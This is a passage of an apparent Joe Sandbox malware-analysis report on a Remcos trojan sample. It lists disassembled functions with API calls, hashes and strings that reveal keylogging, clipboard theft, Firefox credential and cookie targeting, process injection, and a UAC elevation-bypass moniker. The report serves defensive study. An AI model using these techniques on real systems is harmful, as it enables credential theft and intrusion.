                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                • API String ID: 2994406822-18413064
                                • Opcode ID: 46143a75dd4028347809439aaf74d6998f30d4825ee64e2d46a22c89c3e5df59
                                • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                • Opcode Fuzzy Hash: 46143a75dd4028347809439aaf74d6998f30d4825ee64e2d46a22c89c3e5df59
                                • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004120F7 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 238threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00412106
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                • CloseHandle.KERNEL32(00000000), ref: 00412155
                                • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$Mw
                                • API String ID: 3018269243-4030915158
                                • Opcode ID: 973e0795bb2218eb5ec7fcc829698362b3ece89b6ba2b2eacf6a1e6e7bb25139
                                • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                • Opcode Fuzzy Hash: 973e0795bb2218eb5ec7fcc829698362b3ece89b6ba2b2eacf6a1e6e7bb25139
                                • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F474 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 210processCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,(x,?,00475338), ref: 0040F48E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                • String ID: (x$C:\Program Files(x86)\Internet Explorer\$Inj$hdF$hdF$ieinstal.exe$ielowutil.exe$Mw
                                • API String ID: 3756808967-3187772608
                                • Opcode ID: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                • Opcode Fuzzy Hash: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                • FindClose.KERNEL32(00000000), ref: 0040BD12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                • Opcode Fuzzy Hash: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004168C1 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 80clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 004168C2
                                • EmptyClipboard.USER32 ref: 004168D0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID: !D@$hdF
                                • API String ID: 3520204547-3475379602
                                • Opcode ID: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                • Opcode Fuzzy Hash: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                • FindClose.KERNEL32(00000000), ref: 0040BED0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 5d0565dfd04f48ee80346224fd960d4021310761f6a296d7b61b1ca4d4d71a86
                                • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                • Opcode Fuzzy Hash: 5d0565dfd04f48ee80346224fd960d4021310761f6a296d7b61b1ca4d4d71a86
                                • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                • CloseHandle.KERNEL32(?), ref: 00413465
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                • String ID:
                                • API String ID: 297527592-0
                                • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7$VG
                                • API String ID: 0-1861860590
                                • Opcode ID: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                • Opcode Fuzzy Hash: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 00407521
                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object_wcslen
                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                • API String ID: 240030777-3166923314
                                • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                • GetLastError.KERNEL32 ref: 0041A7BB
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: f0a508092aeabfb754dac70d46392ce52f729929a0f06f3e8fb072e170aa9964
                                • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                • Opcode Fuzzy Hash: f0a508092aeabfb754dac70d46392ce52f729929a0f06f3e8fb072e170aa9964
                                • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419AF5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 245fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: (eF$(x$8SG$PXG$PXG$NG
                                • API String ID: 341183262-2834469137
                                • Opcode ID: 1dfe3cfc7b79d75524d00d8ccab6f132fb387ae8ec27b841a732b59c95e35a52
                                • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                • Opcode Fuzzy Hash: 1dfe3cfc7b79d75524d00d8ccab6f132fb387ae8ec27b841a732b59c95e35a52
                                • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID: lJD$lJD$lJD
                                • API String ID: 745075371-479184356
                                • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                • FindClose.KERNEL32(00000000), ref: 0040C47D
                                • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: f210557bed675ad5d36221f6052a79efeb781c0a156dbb9e3500e3c2c137b3c7
                                • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                • Opcode Fuzzy Hash: f210557bed675ad5d36221f6052a79efeb781c0a156dbb9e3500e3c2c137b3c7
                                • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID:
                                • API String ID: 2341273852-0
                                • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                • GetLastError.KERNEL32 ref: 0040A2ED
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                • TranslateMessage.USER32(?), ref: 0040A34A
                                • DispatchMessageA.USER32(?), ref: 0040A355
                                Strings
                                • Keylogger initialization failure: error , xrefs: 0040A301
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
